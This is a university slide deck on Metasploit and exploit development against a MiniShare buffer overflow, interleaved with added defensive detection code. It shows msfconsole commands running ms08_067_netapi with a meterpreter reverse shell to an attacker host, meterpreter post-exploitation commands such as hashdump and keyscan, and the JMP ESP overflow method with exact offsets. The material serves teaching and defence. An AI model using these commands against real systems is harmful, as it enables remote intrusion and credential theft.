Anthony Gabrielson Adam Helbling The University of Massachusetts Lowell 91.661 Project - 1 5/4/2011
Agenda
• Part 1: The Metasploit Framework
  – Basics
  – Running Metasploit
  – The Exploit
  – Demo
  – More on Exploits
• Part 2: From ‘ploit’ to ‘ploit’
  – Overview
  – Assumptions
  – Environment Setup
  – OllyDbg Introduction
  – Vulnerability Explanation
  – Crafting the Exploit
  – Metasploit Enablers
  – Adding Shellcode
The Metasploit Framework: Basics
• Created in 2003 by HD Moore
• Vitals
  – BSD License
  – 700K lines of Ruby
• Currently produced by Rapid7
• De facto standard vulnerability development framework
  – Commercial alternatives:
      Rapid7 has many commercial implementations
      Immunity’s CANVAS
      Core Impact
The Metasploit Framework: Basics (cont’d)
• Metasploit is a well-known anti-forensic and evasion tool
• Modular for ease of development and portability
• msfupdate
  – Get the latest & greatest exploits
• msfconsole
  – The console; also works as a command shell
• Exploit automation
  – db_autopwn
  – Very noisy
  – Requires a database
The Metasploit Framework: Running Metasploit
The Metasploit Framework: The Exploit
• ms08_067_netapi (RANK: Great)
  – This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module; full support for NX bypass on 2003, along with other platforms, is still in development.
  – This attack can be prevented with the MS08-067 patch.
The Metasploit Framework: Demo
The Metasploit Framework: Demo Walkthrough
• msfconsole
  – use exploit/windows/smb/ms08_067_netapi
  – set PAYLOAD windows/meterpreter/reverse_tcp
  – set RHOST 192.168.11.51   [remote host]
  – set LHOST 192.168.11.53   [local host]
  – show options

      Module options (exploit/windows/smb/ms08_067_netapi):

         Name     Current Setting  Required  Description
         ----     ---------------  --------  -----------
         RHOST    192.168.11.51    yes       The target address
         RPORT    445              yes       Set the SMB service port
         SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

      Payload options (windows/meterpreter/reverse_tcp):

         Name      Current Setting  Required  Description
         ----      ---------------  --------  -----------
         EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
         LHOST     192.168.11.53    yes       The listen address
         LPORT     4444             yes       The listen port

  – exploit
The Metasploit Framework: More about the Exploit
• msf exploit(ms08_067_netapi) > show targets

      Exploit targets:

         Id  Name
         --  ----
         0   Automatic Targeting
         1   Windows 2000 Universal
         2   Windows XP SP0/SP1 Universal
         3   Windows XP SP2 English (NX)
         4   Windows XP SP3 English (NX)
         …
         61  Windows 2003 SP2 Japanese (NO NX)
The Metasploit Framework: Meterpreter Commands
• Commands
  – meterpreter > sysinfo

      System Language : en_US
      OS              : Windows XP (Build 2600, Service Pack 2).
      Computer        : AGABRIEL-B90B23
      Architecture    : x86
      Meterpreter     : x86/win32

  – meterpreter > getuid

      Server username: NT AUTHORITY\SYSTEM

  – meterpreter > shell

      Process 396 created.
      Channel 1 created.
      Microsoft Windows XP [Version 5.1.2600]
      (C) Copyright 1985-2001 Microsoft Corp.

      C:\WINDOWS\system32>

  – More
      hashdump
      upload
      webcam_snap
      keyscan_{start, stop, dump}
      ps
From ploit to ploit: Overview
…or how to add a generic exploit to your Metasploit arsenal
• Q: What can you do with a known vulnerability?
  – Craft an exploit and execute it from a command line
  – What else?
• Metasploit is not perfect, but it has its place.
  – Repository
  – Framework
  – Tools to help build exploits
  – Ease of use
• Generic shellcode vs. robust shellcode
• Challenges:
  – Crafting the exploit
  – Reuse of an exploit
From ploit to ploit: Assumptions
• Already spent resources (time, money, etc.) to discover a vulnerability via one (or all) of the following:
  – Fuzzing
  – Static disassembly
  – Review of source code
  – Known vulnerability
      A CVE found on http://cve.mitre.org/
      A security advisory (http://secunia.com/advisories)
  – Known exploit
      Exploit DB (http://www.exploit-db.com/exploits)
From ploit to ploit: Environment Setup
• Vulnerability: MiniShare HTTP “GET” Request Buffer Overflow Vulnerability
• Exploit: MiniShare Remote Buffer Overflow Exploit (C source)
• Windows XP SP2 (or really any XP version)
• MiniShare 1.4.1
• OllyDbg 1.10
• BackTrack 4
  – Metasploit
  – Python
  – Netcat
From ploit to ploit: OllyDbg Introduction
• Main Pane:
  – CPU instructions (Microsoft Assembler format)
• Memory Pane:
  – Current section of memory where the code is executing
• Registers Pane:
  – EIP: address of the next instruction to be executed
  – ESP: stack pointer
• Stack Pane:
  – Shows the entries on the stack
From ploit to ploit: Vulnerability Explanation
• HTTP GET with a large (>1787 bytes) request
  – GET [a string of >1787 bytes] HTTP/1.1\r\n\r\n
• EIP = 0x41414141
  – Access violation when reading [41414141]
  – EIP points to the address containing the next instruction, but 0x41414141 throws an access violation.
• ESP = the address of the buffer that was overflowed.
  – Note the “AAAAAAAAAAAAAAAAAA……AAAA”
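From the defender's side, the request described on this slide has two obvious tells before any memory corruption happens: a request target far longer than any real path, and a long run of one repeated byte. The following checker is an added example written for this transcript, not code from the presenters or from MiniShare; the 1787-byte limit is taken from the slide (a real deployment would use the server's documented maximum), the 64-byte run length is an arbitrary choice, and the two sample requests are constructed.

```python
import re

# Threshold taken from the slide: MiniShare 1.4.1 falls over once the GET
# target exceeds 1787 bytes. A real deployment would use the server's
# documented limit instead.
MAX_TARGET_LEN = 1787
# A run of one repeated byte this long is filler (the "AAAA..." on the
# slide), not a path anyone typed. Arbitrary choice for this example.
MIN_RUN_LEN = 64

# Backreference regex: any byte, then the same byte at least MIN_RUN_LEN-1 more times.
_RUN_RE = re.compile(rb"(.)\1{%d,}" % (MIN_RUN_LEN - 1))


def parse_request_line(raw: bytes):
    """Return (method, target, version) from the first line of a raw HTTP request."""
    first = raw.split(b"\r\n", 1)[0]
    parts = first.split(b" ")
    if len(parts) != 3:
        raise ValueError("request line does not have exactly three fields")
    return parts[0], parts[1], parts[2]


def inspect_request(raw: bytes) -> list:
    """Return a list of human-readable findings; an empty list means nothing odd."""
    try:
        _method, target, version = parse_request_line(raw)
    except ValueError as exc:
        return [f"malformed: {exc}"]
    findings = []
    if len(target) > MAX_TARGET_LEN:
        findings.append(f"oversized target: {len(target)} bytes > {MAX_TARGET_LEN}")
    run = _RUN_RE.search(target)
    if run:
        findings.append(f"byte run: {run.group(1)!r} x {len(run.group(0))}")
    if not version.startswith(b"HTTP/"):
        findings.append(f"bad version token: {version!r}")
    return findings


# Constructed samples: a normal request and one shaped like the slide's crash input.
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: fileserver\r\n\r\n"
CRASH_SHAPED = b"GET " + b"A" * 2000 + b" HTTP/1.1\r\n\r\n"

if __name__ == "__main__":
    for sample in (BENIGN, CRASH_SHAPED):
        print(sample[:40], "->", inspect_request(sample) or "clean")
```

The same two checks are cheap to run at a reverse proxy or in a packet-capture pipeline; the byte-run check is what separates a fuzzer or exploit payload from a merely long but legitimate URL.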
From ploit to ploit: Crafting the Exploit
• This approach is different than the lab exercise assigned.
  – We are not overwriting the stack’s return address here.
  – Instead, let’s find an instruction in the code to transfer our execution:
      \xFF\xE4 = JMP ESP – jump to the address stored in ESP.
      Overwrite EIP with the address of a JMP ESP instruction.
• More robust to some degree because we will pick an address that is predictable and will work across more systems.
  – In Win XP SP2 there is no randomization of the base location where DLLs are loaded, therefore if we choose a DLL it will work on each system that loads this DLL.
  – However, the best choice would be a DLL provided with MiniShare, but there are none, so we revert to using a Windows DLL.
From ploit to ploit: Metasploit Enablers
• /pentest/exploits/framework3/tools/pattern_create.rb
  – Creates a unique pattern of a user-specified length. Useful for understanding the offsets within the buffer that we overwrite.
• /pentest/exploits/framework3/tools/pattern_offset.rb
  – Returns the location where EIP is overwritten and where ESP points to. Finds offsets using the pattern generated by pattern_create.rb.
      • EIP overwritten at 1787 bytes into our buffer
      • ESP points to location 1791 bytes into our buffer
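The two Ruby scripts are small enough that reimplementing them shows exactly how a crash gets triaged: the pattern is the triple product of uppercase, lowercase and digit, so every 4-byte window is unique for the first 20280 bytes, and a register value read off a debugger is the little-endian reading of four consecutive pattern bytes. The block below is an added example for this transcript, not Metasploit's own code; the crash values `SIM_EIP` and `SIM_ESP_DWORD` are constructed from the pattern itself so that they reproduce the slide's 1787 and 1791 offsets, and `triage_crash` is a helper name chosen here.

```python
import string

PATTERN_MAX = 26 * 26 * 10 * 3   # 20280 bytes before 4-byte windows repeat


def pattern_create(length: int) -> str:
    """First `length` characters of the upper/lower/digit cyclic pattern."""
    if not 0 < length <= PATTERN_MAX:
        raise ValueError(f"length must be in 1..{PATTERN_MAX}")
    out = []
    size = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                size += 3
                if size >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, pattern: str):
    """Offset in `pattern` of the 4 bytes a 32-bit register holds, or None.

    `value` is an int or a hex string as a debugger shows it (e.g. "0x41336141").
    x86 reads the dword little-endian, so the register shows the bytes reversed.
    """
    if isinstance(value, str):
        value = int(value, 16)           # accepts an optional 0x prefix
    needle = value.to_bytes(4, "little").decode("ascii", "replace")
    idx = pattern.find(needle)
    return None if idx < 0 else idx


def triage_crash(eip, esp_dword, buffer_len: int) -> dict:
    """Map crash-time EIP and the dword at ESP back to offsets in a pattern buffer."""
    pattern = pattern_create(buffer_len)
    return {"eip_offset": pattern_offset(eip, pattern),
            "esp_offset": pattern_offset(esp_dword, pattern)}


# Constructed crash values: pretend a 2000-byte pattern was sent and the
# debugger showed EIP holding pattern[1787:1791] and ESP pointing at
# pattern[1791], the two numbers quoted on the slide.
_P = pattern_create(2000)
SIM_EIP = int.from_bytes(_P[1787:1791].encode(), "little")
SIM_ESP_DWORD = int.from_bytes(_P[1791:1795].encode(), "little")

if __name__ == "__main__":
    print(pattern_create(30))
    print(triage_crash(SIM_EIP, SIM_ESP_DWORD, 2000))   # {'eip_offset': 1787, 'esp_offset': 1791}
```

The same lookup is what makes a fuzzer crash classifiable: if EIP maps to an offset inside the pattern, the overwrite is attacker-controlled and the bug is worth a patch priority well above a plain denial of service.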
From ploit to ploit: Adding Shellcode
• Using msfpayload, which comes with Metasploit, we will create a useful piece of shellcode which creates a reverse shell on a port.
  – What is a reverse shell?
  – Note: Does this give us away?!
  – C-style vs. raw output (‘C’ vs. ‘R’)
• Does anyone see a problem with some of this shellcode?
  – msfencode can help us…
• Let’s add some NOPs to help improve stability.
• Now all that would need to be done is to add this to Metasploit as a Ruby script. (Note: it’s already in there.)
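"Does this give us away?" has a concrete answer: a reverse shell is the compromised host opening an outbound TCP connection back to the handler (LHOST/LPORT on the demo slide), and a file server process has no reason to initiate outbound connections at all. The detector below is an added example for this transcript, not code from the presenters; the log line format, the set of service processes and the sample lines are all constructed, and port 4444 is only included because it is the default LPORT shown earlier in the deck.

```python
from dataclasses import dataclass

# Processes that only ever accept connections on this host; any outbound
# TCP connection they initiate is a signal. Set chosen for this example.
SERVICE_PROCESSES = {"minishare.exe", "svchost.exe", "services.exe"}
# Default LPORT from the demo slide; weak on its own, useful combined.
SUSPECT_PORTS = {4444}


@dataclass
class Conn:
    ts: str
    proc: str
    pid: int
    direction: str      # "out" = initiated by this host, "in" = accepted
    raddr: str
    rport: int


def parse_line(line: str) -> Conn:
    """Parse one constructed log line:
    '<ts> <proc> <pid> <out|in> <laddr>:<lport> <arrow> <raddr>:<rport>'"""
    ts, proc, pid, direction, _local, _arrow, remote = line.split()
    raddr, rport = remote.rsplit(":", 1)
    return Conn(ts, proc.lower(), int(pid), direction, raddr, int(rport))


def reasons_for(conn: Conn) -> list:
    """Why this connection looks like a reverse shell; empty if it does not."""
    reasons = []
    if conn.direction != "out":
        return reasons                       # inbound traffic is the service's job
    if conn.proc in SERVICE_PROCESSES:
        reasons.append(f"{conn.proc} (pid {conn.pid}) initiated an outbound connection")
    if conn.rport in SUSPECT_PORTS:
        reasons.append(f"remote port {conn.rport} is a known default handler port")
    return reasons


def find_alerts(lines) -> list:
    """Return (timestamp, process, reasons) for every line that scores."""
    alerts = []
    for line in lines:
        conn = parse_line(line)
        reasons = reasons_for(conn)
        if reasons:
            alerts.append((conn.ts, conn.proc, reasons))
    return alerts


SAMPLE_LOG = [
    # constructed: the file server accepting a normal request
    "2011-05-04T10:00:01 MiniShare.exe 1204 in 192.168.11.51:80 <- 192.168.11.53:50112",
    # constructed: the same process calling back to a handler on port 4444
    "2011-05-04T10:00:02 MiniShare.exe 1204 out 192.168.11.51:1035 -> 192.168.11.53:4444",
    # constructed: ordinary browser traffic, should stay quiet
    "2011-05-04T10:00:03 firefox.exe 2210 out 192.168.11.51:1036 -> 203.0.113.10:443",
]

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print(alert)
```

The process-role check is the durable one: the handler port is trivially changed, but a service that starts dialling out after accepting a request stays suspicious whatever port it uses.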
References and Conclusions
• http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html
• This presentation just begins to scratch the surface
  – http://www.offensive-security.com/metasploitunleashed/Metasploitable
• Questions?
The Metasploit Framework: The Exploit (2)
• psexec
  – A lightweight telnet replacement that lets you execute processes on other systems
  – This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.
  – This one has more, list ‘em
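The detail that the service "uses a randomly chosen name and description" is the defender's hook: legitimate services have names a human picked, so a freshly installed service whose name is a high-entropy alphanumeric token, especially with its binary outside the usual system directories, is worth a look. The triage below is an added example for this transcript, not code from the presenters or from Metasploit; the entropy and vowel thresholds are heuristics chosen here, the trusted-directory list is an assumption, and the records are constructed from the fields the Windows System log's "service was installed" event (ID 7045) carries.

```python
import math
import re
from collections import Counter

# Directories a legitimate service binary normally lives under (heuristic).
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\")


def shannon_entropy(s: str) -> float:
    """Bits per character; 0.0 for a single repeated character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_random(name: str) -> bool:
    """One alphanumeric token, 8+ chars, high entropy, vowel-poor (heuristic)."""
    if len(name) < 8 or not re.fullmatch(r"[A-Za-z0-9]+", name):
        return False
    vowels = sum(ch in "aeiouAEIOU" for ch in name)
    return shannon_entropy(name) > 3.0 and vowels / len(name) < 0.25


def image_path_unusual(path: str) -> bool:
    """True when the service binary is not under a trusted directory."""
    p = path.strip().strip('"').lower()
    return not p.startswith(TRUSTED_DIRS)


def triage(events) -> list:
    """Return (name, [reasons]) for each service-install record worth a look."""
    flagged = []
    for ev in events:
        reasons = []
        if looks_random(ev["name"]):
            reasons.append("service name looks machine-generated")
        if image_path_unusual(ev["path"]):
            reasons.append(f"binary outside trusted dirs: {ev['path']}")
        if reasons:
            flagged.append((ev["name"], reasons))
    return flagged


# Constructed service-install records, reduced to the fields used here.
SAMPLE_EVENTS = [
    {"ts": "2011-05-04 10:00:00", "name": "wuauserv",
     "path": "C:\\Windows\\system32\\svchost.exe -k netsvcs"},
    {"ts": "2011-05-04 10:05:12", "name": "XcFqLpRzTvWk",
     "path": "C:\\Windows\\Temp\\XcFqLpRzTvWk.exe"},
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EVENTS):
        print(name, reasons)
```

Because the tool also "cleans up after itself", the install event is often the only durable artifact, which is a good argument for forwarding service-installation events off the host rather than relying on what is still present at investigation time.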
The Exploit (3)
• ms05_039_pnp
  – Vulnerability in Plug and Play Could Allow Remote Code Execution and Elevation of Privilege
  – This module exploits a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. NOTE: Since the PnP service runs inside the services.exe process, a failed exploit attempt will cause the system to automatically reboot.
  – Affected systems: Win2k SP4, Win XP SP2, etc.